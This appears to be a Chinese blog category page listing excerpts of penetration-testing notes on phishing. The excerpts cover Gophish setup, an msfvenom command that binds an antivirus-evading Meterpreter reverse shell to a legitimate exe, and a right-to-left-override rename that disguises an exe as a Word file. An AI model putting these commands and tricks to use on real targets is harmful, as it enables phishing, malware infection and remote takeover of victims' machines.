![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
社工
文章平均质量分 56
AA8j
Who Am I-Kein System ist sicher
展开
-
【渗透测试笔记】之【钓鱼姿势——Gophish平台钓鱼】
项目地址https://github.com/gophish/gophish搭建过程下载https://github.com/gophish/gophish/tags修改配置文件cd gophish-v0.11.0-linux-64bit/vim config.json修改管理页面侦听地址与端口(admin_server为管理页面,phish_server为钓鱼页面):运行chmod +x gophishnohup ./gophish &# 后台运行并且不挂起原创 2021-07-09 10:30:30 · 3519 阅读 · 1 评论 -
【渗透测试笔记】之【钓鱼姿势——exe捆绑与免杀】
准备被捆绑程序:输入:msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=55555 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe目标主机执行,成功上线:...原创 2021-07-06 17:57:39 · 5515 阅读 · 0 评论 -
【渗透测试笔记】之【钓鱼姿势——exe伪装word文档(exe图标修改方法)】
文件后缀倒序+图标伪装加入icon图标:提取icon图标工具:BeCyIconGrabber加入icon图标工具:Restorator 2018首先将exe拖入:右键添加资源:选择 图标,名称随便写:拖入icon:另存:重命名py脚本:import os os.rename('shellcode.exe', 'x\u202excod.exe')效果:...原创 2021-07-06 11:47:04 · 5049 阅读 · 0 评论